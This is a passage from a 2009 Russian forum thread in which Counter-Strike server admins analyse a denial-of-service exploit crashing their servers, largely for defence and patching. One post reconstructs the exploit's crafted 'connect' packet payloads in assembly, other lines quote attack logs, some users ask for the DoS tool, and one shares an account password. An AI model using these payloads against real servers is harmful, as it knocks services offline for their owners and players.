Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

> Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
7 страниц V  « 5 6 7

ложут сервер!dos

Статус пользователя Endi
сообщение 11.6.2009, 9:07
Сообщение #101


Стаж: 17 лет

Сообщений: 43
Благодарности: выкл.

Так никто и не отснифил трафик ?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
holoc
сообщение 11.6.2009, 14:38
Сообщение #102
Стаж: 19 лет

Сообщений: 749
Благодарностей: 5723
Полезность: 0

Тут есть кто о фаерволах еще не слышал, а ты уже про сниффер :biggrin:
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 10 раз
   + Цитировать сообщение
Fedcomp
сообщение 11.6.2009, 16:32
Сообщение #103
Стаж: 17 лет

Сообщений: 3899
Благодарностей: 701
Полезность: 0

Цитата(Endi @ 11.6.2009, 11:07) *
Так никто и не отснифил трафик ?


maarik со сплойтом пропал чтото ... pardon.gif
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя maarik
сообщение 13.6.2009, 23:07
Сообщение #104


Стаж: 18 лет

Сообщений: 821
Благодарностей: 257
Полезность: 711

Меценат Меценат

Fedcomp,
Я никуда не пропадал, а просто уезжал на соревнования.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Barinok
сообщение 13.6.2009, 23:51
Сообщение #105


Стаж: 18 лет

Сообщений: 146
Благодарностей: 145
Полезность: 966

братишка maarika=)))) все мы тут браятья=))))
Ты скинеш прогу чтоб валить сервера ddos atac?
они мне валят, а я чем хуже????=)))

Отредактировал: Barinok, - 13.6.2009, 23:52
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя FOX2PRO
сообщение 14.6.2009, 0:17
Сообщение #106
Стаж: 17 лет

Сообщений: 15
Благодарностей: 1
Полезность: 0

Цитата(Barinok @ 10.6.2009, 16:45) *
Плиз скинь ту програму что по той ссылке а то там пишит Вы можете зарегистрироваться с 6:00 до 8:00 и с 15:00 до 16:00 MSK (сейчас 17:44 MSK)! а мне ждать ловить то время=)))
Скидуй сюда если есть у тебя плиз!!!

акаунт beta16 пароль 123
рейтинг накрученый, пользуйтесь, нежалко=) ток сильно не терзайте


Цитата(gto3zr @ 11.6.2009, 9:09) *
подсеть банить тоже не вариант тут надо искать какйто другой выход. pardon.gif

я считаю что забанить подсеть подойдёт как временное решение проблемы, пока не сделают защиту

держу сервер 2 с лишним месяца, пока не нарвался на такого

Отредактировал: FOX2PRO, - 14.6.2009, 0:16
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя maarik
сообщение 14.6.2009, 0:20
Сообщение #107


Стаж: 18 лет

Сообщений: 821
Благодарностей: 257
Полезность: 711

Меценат Меценат

Barinok,
Пиши в асю
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Eagle-Killer
сообщение 14.6.2009, 10:43
Сообщение #108


Стаж: 19 лет

Сообщений: 96
Благодарностей: 10
Полезность: 86

Блин выложите кто этот сплойт хоть в бинарном виде без исходников и мы с энди его по кусочкам разберём методом дизасма или того проще протестить на локальном сервере и сосниффить идущие пакеты.
maarik,
а чего ты не можешь по удалёнке скопировать себе файл на комп?) Если там стоит разрешение на только чтение и выполнение, то всё равно можно копировать.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Fedcomp
сообщение 14.6.2009, 10:57
Сообщение #109
Стаж: 17 лет

Сообщений: 3899
Благодарностей: 701
Полезность: 0

Проблема в том что кто то не хочет чтобы на сплойт появилась защита и на нем нельзя было делать деньги
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Eagle-Killer
сообщение 14.6.2009, 13:27
Сообщение #110


Стаж: 19 лет

Сообщений: 96
Благодарностей: 10
Полезность: 86

Нашли на чём бабло делать - на чужом горе наживаются скоты.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Fedcomp
сообщение 14.6.2009, 15:47
Сообщение #111
Стаж: 17 лет

Сообщений: 3899
Благодарностей: 701
Полезность: 0

Знаешь как сейчас хорошо навариваются на ддосе сайтов?
боюсь эксплойт попадет в наши руки нескоро
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Toxa001
сообщение 16.6.2009, 21:24
Сообщение #112
Стаж: 17 лет

Сообщений: 23
Благодарностей: 4
Полезность: 133

maarik напиши пожалуйста в icq : 397731591 ... Надо проверить заплатку ( прошу тебя т.к. те кто досил сервера уже в бане =) и проверить на них не могу )

Отредактировал: Toxa001, - 16.6.2009, 21:25
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя maarik
сообщение 16.6.2009, 22:11
Сообщение #113


Стаж: 18 лет

Сообщений: 821
Благодарностей: 257
Полезность: 711

Меценат Меценат

Toxa001,
Написал

Отредактировал: maarik, - 16.6.2009, 22:13
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Toxa001
сообщение 17.6.2009, 11:26
Сообщение #114
Стаж: 17 лет

Сообщений: 23
Благодарностей: 4
Полезность: 133

Сегодня с утра болгары опять взялись за своё ... отснифал трафик , и обнаружил странную штуку ... сплойт подключается к серверу с одного порта (отображается в консоли сервера ) , а в логах снифера совсем другой порт ... и других там нету , тестировал 4 раза , все равно одно и тоже.

Кто хочет поковыряться в логах стучите в icq: 397731591
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Endi
сообщение 18.6.2009, 10:58
Сообщение #115


Стаж: 17 лет

Сообщений: 43
Благодарности: выкл.

По логам, которые скинул Toxa001, удалось сэмулировать эксплоит. У себя в сетке пробовал, валит все серваки кроме одного, в ответ приходит "Get lost Lamer! Protected by AntiCSDoS by Shocker".

Отсюда вывод:
Либо в логах был зафиксирован старый эксплоит, которого AntiCSDoS удачно ловит.
Либо на том серваке как-то по замудренному настроен AntiCSDoS, и распознает неизвестную гадость. Ибо тут говорили что тестили со включенным AntiCSDoS, и не помогало.

Отредактировал: Endi, - 18.6.2009, 11:00
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Fedcomp
сообщение 18.6.2009, 11:33
Сообщение #116
Стаж: 17 лет

Сообщений: 3899
Благодарностей: 701
Полезность: 0

Шокер новую версию часом не выпускал?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
holoc
сообщение 18.6.2009, 12:29
Сообщение #117
Стаж: 19 лет

Сообщений: 749
Благодарностей: 5723
Полезность: 0

Version 3.2
Updated 03/24/2008

Это последняя версия
Цитата(saransh)
my server stopped crashing after csdos.but then some 1 would join as hltv proxy and my server crashes again.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 10 раз
   + Цитировать сообщение
Статус пользователя maarik
сообщение 19.6.2009, 0:00
Сообщение #118


Стаж: 18 лет

Сообщений: 821
Благодарностей: 257
Полезность: 711

Меценат Меценат

v 3.2 не спасает от него (от нового сплойта)
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Endi
сообщение 19.6.2009, 10:32
Сообщение #119


Стаж: 17 лет

Сообщений: 43
Благодарности: выкл.

Отправляется запрос Getchallenge, для получения номера.
Потом этот номер ставиться в запрос конекта и отправляется:
Код
           db 0ffh,0ffh,0ffh,0ffh
           db 'connect 47 1831575444 "'
           db '\prot\2'
           db '\unique\0'
           db '\raw\f0f0f05b8229e0929055bceb5fa0b260'
           db '\cdkey\119324f5d8004cc2ced05b79f80fb123'
           db '" "'
           db '\model\gordon'
           db '\topcolor\128'
           db '\bottomcolor\128'
           db '\rate\9999.000000'
           db '\cl_updaterate\20'
           db '\cl_lw\1'
           db '\cl_lc\1'
           db '\name\Exploit1'
           db '\"',0ah,00h


А потом отправляется такой же запрос, но с модифицированными raw,cdkey,name и с другого source port'a.
Код
           db 0ffh,0ffh,0ffh,0ffh
           db 'connect 47 1831575444 "'
           db '\prot\2'
           db '\unique\0'
           db '\raw\83ca16bf9ce2c2038ee71208729e69cd'
           db '\cdkey\668e85dcc0a8ba992e68256699b02b62'
           db '" "'
           db '\model\gordon'
           db '\topcolor\128'
           db '\bottomcolor\128'
           db '\rate\9999.000000'
           db '\cl_updaterate\20'
           db '\cl_lw\1'
           db '\cl_lc\1'
           db '\name\Exploit2'
           db '\"',0ah,00h


И бабах..

Но это старый трюк, точнее подмена source port это новая реализация, а вот AntiCSDoS рагуется именно из за слеша в конце запроса.
Код
db '\"',0ah,00h


Вот всю эту инфу удалось вынуть из логов, почему при атаке Эксплоита AntiCSDoS не ругается, а при атаке эмулятора - ругатется, пока не понятно :)

Отредактировал: Endi, - 19.6.2009, 10:35
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Fox
сообщение 19.6.2009, 10:53
Сообщение #120
Стаж: 19 лет

Сообщений: 20
Благодарности: выкл.

В логах Линуха выглядит так

[connect 47 1899384797 "\prot\2\raw\1985753c9cfe1a28296c3d3ff2b612da" "\_cl_autowepswitch\1\cl_dlmax\80\cl_lc\1\cl_lw\1\cl_updaterate\1000\_ah\0\ah\0\dm\0\_vgui_menus\1\lang\ru\rate\25000\*FA \5QE3H1B2RJ6EC31CS0VA\*FH\96ab944173\bottomcolor\0\topcolor\0\model\0\name\BeastBoy"#012°ИҐ·<G¬·#030ЦЅї¤‰уµёЦЅї<G¬·xФЅї` Т·#030ХЅї<G¬·аeчµМЋуµШЦЅї]

connect 47 1946967899 "\prot\2\raw\54741752c8031016d873cf041391a7aa" "\_cl_autowepswitch\1\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\name\BuFu\_pw\1234\\1\_vgui_menus\1\_ah\1\rate\25000\*FA \E10GS3CNRJ6EC31CS0VA\*FH\25bfe08efb\*fid\0\bottomcolor\0\topcolor\0\model\0"#012ј†™їP№¤·<ч§·˜г'¶#001]


[connect 47 127664343 "\prot\2\raw\6212c02d9f28ce1f1665de10dd6221cc" "\_cl_autowepswitch\1\cl_dlmax\80\cl_lc\1\cl_lw\1\cl_updaterate\20\name\zaeka\status_monitor\0\_pw-home\nevena\_vgui_menus\1\_ah\1\rate\35000\*FA \PFD110K1BBZKNBRJ6EC3\*FH\f348741a03\*fid\0\bottomcolor\0\topcolor\0\model\0"#0128рТї˜оТїЊоТїфоТї°иЉ·<g‘·˜оТїЬ¬#004¶8пТї]



Меняются значения cl_dlmax и cl_updaterate

Зы: Endi Зделай заплатку и людям поможешь и себя пропиаришь с хорошей стороны :)

Отредактировал: Fox, - 19.6.2009, 10:55
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
7 страниц V  « 5 6 7
 
Тема закрытаНачать новую тему
 
0 пользователей и 1 гостей читают эту тему: